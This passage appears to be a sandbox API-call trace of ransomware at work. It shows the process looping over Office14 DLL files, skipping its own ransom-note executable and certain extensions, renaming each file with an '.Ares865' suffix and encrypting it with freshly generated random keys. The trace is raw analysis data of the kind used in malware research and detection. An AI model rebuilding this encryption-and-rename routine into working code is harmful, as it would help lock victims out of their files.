out: hHeap=0x2b0000) returned 1 [0129.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.235] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.235] CloseHandle (hObject=0x170) returned 1 [0129.235] CloseHandle (hObject=0x118) returned 1 [0129.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.235] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e19db00, ftCreationTime.dwHighDateTime=0x1cb701d, ftLastAccessTime.dwLowDateTime=0xade41600, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e19db00, ftLastWriteTime.dwHighDateTime=0x1cb701d, nFileSizeHigh=0x0, nFileSizeLow=0x3e380, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OLKFSTUB.DLL", cAlternateFileName="")) returned 1 [0129.235] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.235] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="aoldtz.exe") returned 1 [0129.236] lstrcpyW (in: lpString1=0x2cce462, lpString2="OLKFSTUB.DLL" | out: lpString1="OLKFSTUB.DLL") returned="OLKFSTUB.DLL" [0129.236] lstrlenW (lpString="OLKFSTUB.DLL") returned 12 [0129.236] lstrlenW (lpString="Ares865") returned 7 [0129.236] lstrcmpiW (lpString1="TUB.DLL", lpString2="Ares865") returned 1 [0129.236] lstrlenW (lpString=".dll") returned 4 [0129.236] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2=".dll") returned 1 [0129.236] lstrlenW (lpString=".lnk") returned 4 [0129.236] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2=".lnk") returned 1 [0129.236] lstrlenW (lpString=".ini") returned 4 [0129.236] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2=".ini") returned 1 [0129.236] lstrlenW (lpString=".sys") returned 4 [0129.236] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2=".sys") returned 1 [0129.236] lstrlenW (lpString="OLKFSTUB.DLL") returned 12 [0129.236] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL.Ares865") returned 69 [0129.236] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\olkfstub.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\olkfstub.dll.ares865"), dwFlags=0x1) returned 1 [0129.238] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\olkfstub.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.238] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254848) returned 1 [0129.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.239] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.239] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.239] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.240] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.240] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.240] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e680, lpName=0x0) returned 0x170 [0129.241] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e680) returned 0x420000 [0129.252] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.253] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.253] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.253] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0129.256] CloseHandle (hObject=0x170) returned 1 [0129.256] CloseHandle (hObject=0x118) returned 1 [0129.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.257] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dee4000, ftCreationTime.dwHighDateTime=0x1cba068, ftLastAccessTime.dwLowDateTime=0xad14fe60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7dee4000, ftLastWriteTime.dwHighDateTime=0x1cba068, nFileSizeHigh=0x0, nFileSizeLow=0x9d590, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ONBttnIE.dll", cAlternateFileName="")) returned 1 [0129.257] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.257] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2="aoldtz.exe") returned 1 [0129.257] lstrcpyW (in: lpString1=0x2cce462, lpString2="ONBttnIE.dll" | out: lpString1="ONBttnIE.dll") returned="ONBttnIE.dll" [0129.257] lstrlenW (lpString="ONBttnIE.dll") returned 12 [0129.257] lstrlenW (lpString="Ares865") returned 7 [0129.258] lstrcmpiW (lpString1="nIE.dll", lpString2="Ares865") returned 1 [0129.258] lstrlenW (lpString=".dll") returned 4 [0129.258] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2=".dll") returned 1 [0129.258] lstrlenW (lpString=".lnk") returned 4 [0129.258] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2=".lnk") returned 1 [0129.258] lstrlenW (lpString=".ini") returned 4 [0129.258] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2=".ini") returned 1 [0129.258] lstrlenW (lpString=".sys") returned 4 [0129.258] lstrcmpiW (lpString1="ONBttnIE.dll", lpString2=".sys") returned 1 [0129.258] lstrlenW (lpString="ONBttnIE.dll") returned 12 [0129.258] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll.Ares865") returned 69 [0129.258] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnie.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnie.dll.ares865"), dwFlags=0x1) returned 1 [0129.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnie.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.261] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=644496) returned 1 [0129.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.261] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.262] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.262] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.262] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9d890, lpName=0x0) returned 0x170 [0129.264] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9d890) returned 0xdd0000 [0129.288] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.289] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.289] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.289] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0129.295] CloseHandle (hObject=0x170) returned 1 [0129.295] CloseHandle (hObject=0x118) returned 1 [0129.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.298] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dee4000, ftCreationTime.dwHighDateTime=0x1cba068, ftLastAccessTime.dwLowDateTime=0xadeffce0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7dee4000, ftLastWriteTime.dwHighDateTime=0x1cba068, nFileSizeHigh=0x0, nFileSizeLow=0x79590, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ONBttnIELinkedNotes.dll", cAlternateFileName="ONBTTN~1.DLL")) returned 1 [0129.298] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.298] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2="aoldtz.exe") returned 1 [0129.298] lstrcpyW (in: lpString1=0x2cce462, lpString2="ONBttnIELinkedNotes.dll" | out: lpString1="ONBttnIELinkedNotes.dll") returned="ONBttnIELinkedNotes.dll" [0129.298] lstrlenW (lpString="ONBttnIELinkedNotes.dll") returned 23 [0129.298] lstrlenW (lpString="Ares865") returned 7 [0129.298] lstrcmpiW (lpString1="tes.dll", lpString2="Ares865") returned 1 [0129.299] lstrlenW (lpString=".dll") returned 4 [0129.299] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2=".dll") returned 1 [0129.299] lstrlenW (lpString=".lnk") returned 4 [0129.299] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2=".lnk") returned 1 [0129.299] lstrlenW (lpString=".ini") returned 4 [0129.299] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2=".ini") returned 1 [0129.299] lstrlenW (lpString=".sys") returned 4 [0129.299] lstrcmpiW (lpString1="ONBttnIELinkedNotes.dll", lpString2=".sys") returned 1 [0129.299] lstrlenW (lpString="ONBttnIELinkedNotes.dll") returned 23 [0129.299] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll.Ares865") returned 80 [0129.299] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnielinkednotes.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnielinkednotes.dll.ares865"), dwFlags=0x1) returned 1 [0129.302] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnielinkednotes.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.302] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=497040) returned 1 [0129.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.303] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.303] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.304] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.304] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x79890, lpName=0x0) returned 0x170 [0129.305] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x79890) returned 0x420000 [0129.324] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.325] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.325] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.325] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0129.330] CloseHandle (hObject=0x170) returned 1 [0129.330] CloseHandle (hObject=0x118) returned 1 [0129.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.332] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9322e700, ftCreationTime.dwHighDateTime=0x1cbae3c, ftLastAccessTime.dwLowDateTime=0xae1d3700, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x9322e700, ftLastWriteTime.dwHighDateTime=0x1cbae3c, nFileSizeHigh=0x0, nFileSizeLow=0xe0db0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteSyncPC.dll", cAlternateFileName="ONENOT~1.DLL")) returned 1 [0129.332] lstrcmpiW (lpString1="OneNoteSyncPC.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.332] lstrcmpiW (lpString1="OneNoteSyncPC.dll", lpString2="aoldtz.exe") returned 1 [0129.332] lstrcpyW (in: lpString1=0x2cce462, lpString2="OneNoteSyncPC.dll" | out: lpString1="OneNoteSyncPC.dll") returned="OneNoteSyncPC.dll" [0129.333] lstrlenW (lpString="OneNoteSyncPC.dll") returned 17 [0129.333] lstrlenW (lpString="Ares865") returned 7 [0129.333] lstrcmpiW (lpString1="cPC.dll", lpString2="Ares865") returned 1 [0129.333] lstrlenW (lpString=".dll") returned 4 [0129.333] lstrcmpiW (lpString1="OneNoteSyncPC.dll", lpString2=".dll") returned 1 [0129.333] lstrlenW (lpString=".lnk") returned 4 [0129.333] lstrcmpiW (lpString1="OneNoteSyncPC.dll", lpString2=".lnk") returned 1 [0129.333] lstrlenW (lpString=".ini") returned 4 [0129.333] lstrcmpiW (lpString1="OneNoteSyncPC.dll", lpString2=".ini") returned 1 [0129.333] lstrlenW (lpString=".sys") returned 4 [0129.333] lstrcmpiW (lpString1="OneNoteSyncPC.dll", lpString2=".sys") returned 1 [0129.333] lstrlenW (lpString="OneNoteSyncPC.dll") returned 17 [0129.333] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll.Ares865") returned 74 [0129.333] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onenotesyncpc.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onenotesyncpc.dll.ares865"), dwFlags=0x1) returned 1 [0129.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onenotesyncpc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.336] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=921008) returned 1 [0129.336] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.336] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.336] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.336] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.337] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.337] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.337] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe10b0, lpName=0x0) returned 0x170 [0129.339] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe10b0) returned 0xdd0000 [0129.373] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.374] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.374] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.374] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0129.382] CloseHandle (hObject=0x170) returned 1 [0129.383] CloseHandle (hObject=0x118) returned 1 [0129.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.387] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9b4fa00, ftCreationTime.dwHighDateTime=0x1cba057, ftLastAccessTime.dwLowDateTime=0xadf25e40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa9b4fa00, ftLastWriteTime.dwHighDateTime=0x1cba057, nFileSizeHigh=0x0, nFileSizeLow=0xf9a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ONLNTCOMLIB.DLL", cAlternateFileName="ONLNTC~1.DLL")) returned 1 [0129.387] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.387] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="aoldtz.exe") returned 1 [0129.387] lstrcpyW (in: lpString1=0x2cce462, lpString2="ONLNTCOMLIB.DLL" | out: lpString1="ONLNTCOMLIB.DLL") returned="ONLNTCOMLIB.DLL" [0129.387] lstrlenW (lpString="ONLNTCOMLIB.DLL") returned 15 [0129.387] lstrlenW (lpString="Ares865") returned 7 [0129.387] lstrcmpiW (lpString1="LIB.DLL", lpString2="Ares865") returned 1 [0129.387] lstrlenW (lpString=".dll") returned 4 [0129.387] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2=".dll") returned 1 [0129.387] lstrlenW (lpString=".lnk") returned 4 [0129.387] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2=".lnk") returned 1 [0129.387] lstrlenW (lpString=".ini") returned 4 [0129.387] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2=".ini") returned 1 [0129.387] lstrlenW (lpString=".sys") returned 4 [0129.387] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2=".sys") returned 1 [0129.387] lstrlenW (lpString="ONLNTCOMLIB.DLL") returned 15 [0129.388] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL.Ares865") returned 72 [0129.388] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft 